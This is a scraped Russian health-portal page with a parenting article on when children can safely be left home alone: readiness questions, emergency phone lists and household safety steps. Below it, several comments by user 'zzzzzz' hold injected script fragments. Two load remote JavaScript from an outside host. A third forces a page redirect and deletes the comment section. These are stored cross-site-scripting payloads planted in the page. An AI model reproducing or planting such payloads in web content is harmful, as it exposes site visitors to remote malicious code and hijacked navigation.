Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Когда уже можно оставить ...  >>  Когда уже можно оставить ребенка одного дома?
 
Обратная связь
 

Когда уже можно оставить ребенка одного дома?

Размер шрифта
19 июня 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Стоит вам только задуматься о том, чтобы оставить ребенка дома без присмотра, как в голове сразу же возникают сцены из фильма «Один дома»? Вы представляете себе бесконечные компьютерные игры, горы фастфуда и шумные вечеринки с друзьями? Однако вполне возможно, что вы зря беспокоитесь, и ваш ребенок уже вполне самостоятелен для того, чтобы остаться дома одному.

Когда уже можно оставить ребенка одного дома?

Ваши опасения вполне оправданы, однако если вы все же решитесь оставить ребенка одного, вы получите целый ряд преимуществ. Вы сможете воспитать в ребенке чувство ответственности, вам будет на кого оставить младших детей и к тому же вы наконец сможете провести тихий вечер наедине со своим супругом.

Так как же понять, в каком возрасте уже можно оставить ребенка одного? Достаточно ли он взрослый, чтобы присмотреть за младшим братом или сестрой? Ученые считают, что ответы на эти вопросы зависят от конкретной ситуации.

Большинство экспертов сходятся во мнении, что в 10-11 лет ребенка уже можно начать оставлять одного на короткие периоды времени (меньше часа) в течение дня, чтобы убедиться, что его это не испугает, и он уже достаточно взрослый, чтобы вести себя должным образом. Однако возможно вам стоит подождать еще год или два, прежде чем оставлять ребенка одного на всю ночь. Вот несколько вопросов, которые вам стоит задать себе, прежде чем оставить ребенка одного:

  • Вы живете в спокойном районе? Каков в нем уровень преступности?
  • Есть ли у вас в доме охранная система и умеет ли ваш ребенок пользоваться ей?
  • Способен ли ваш ребенок следовать важнейшим правилам: запирать дверь после выхода из квартиры, не открывать дверь посторонним людям?
  • Проявляет ли ваш ребенок должную рассудительность и ответственность (например, в отношении домашних заданий или работы по дому)?
  • Есть ли у вас друзья, соседи или члены семьи, которые могут немедленно приехать к вам домой в случае возникновения экстренной ситуации?
  • Спокойно ли ваш ребенок воспринимает идею остаться дома одному?

Если вы ответили «да» на большую часть этих вопросов, ваш ребенок скорее всего готов остаться дома один. Однако прежде чем вы в первый раз оставите его за главного, убедитесь в том, что он знает следующие базовые вещи:

  • что делать в том случае, если кто-то звонит в дверь,
  • что делать, если звонит телефон,
  • можно ли приглашать в гости друзей, и если можно, то скольких,
  • что он может есть, пока находится дома один, сколько времени ему разрешено смотреть телевизор и играть в компьютерные игры.

Также вам стоит подготовить свой дом, чтобы ребенку было в нем максимально удобно, когда он останется один. Позаботьтесь заранее о наиболее важных вещах и не забудьте составить список телефонов на случай экстренной ситуации и повесить его на видное место. В этом списке обязательно должны быть:

  • ваш мобильный телефон,
  • телефоны родственников или друзей, живущих неподалеку,
  • телефоны соседей,
  • телефоны ваших врачей,
  • телефонные номера для вызова скорой, пожарных и полиции.

Обязательно обсудите с ребенком заранее, что нужно делать в экстренных случаях, таких как пожар, отключение электричества, а также в случае экстремальных погодных условий. Соберите аптечку со всем необходимым и объясните ребенку, как именно ей пользоваться. Прежде чем уйдете, убедитесь, что телефонная линия работает. Убедитесь, что у вас дома достаточно еды и ваш ребенок не останется голодным. Можете также научить его пользоваться микроволновкой, электрочайником, тостером или другими кухонными приборами, чтобы он мог сам приготовить себе поесть. Обязательно спрячьте все, до чего ваш ребенок не должен добраться; это могут быть рецептурные препараты, алкоголь, сигареты и оружие.

В первый раз не уходите надолго, оставьте ребенка одного на полчаса или час. Когда вернетесь, обсудите с ним, как все прошло. В дальнейшем можете постепенно увеличивать время своего отсутствия.

И запомните, если вы все же решились и оставили ребенка одного, вы должны всегда быть на связи. Не забывайте брать с собой мобильный телефон и всегда отвечайте на звонки, а также время от времени звоните ребенку сами, чтобы удостовериться, что у него все в порядке.

Другие статьи о воспитании детей и не только ищите на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

29 июня 2015 в 23:51

Комментарий удален за нарушение Правил общения

2 - zzzzzz

29 июня 2015 в 23:56

Комментарий удален за нарушение Правил общения

3 - zzzzzz

30 июня 2015 в 18:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:08

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что можно узнать о жизни ребенка в социальных сетях   Арт-парад Елки-2015: приносим праздник в детские больницы   Родители стали хуже после падения Берлинской стены!   Тайные опасности для ребенка дома  
17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца! 10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка
 
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 18 апреля 2013Не запрещайте ребенку играть в видеоигры, они лечат смертельные болезни
 

Слайдшоу

1
Как кормить грудью
Первые шаги вашего малыша
Как устроить дом, чтобы не убить ребенка

Тесты

Электричество в спальне
Безопасна ли ваша кухня?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.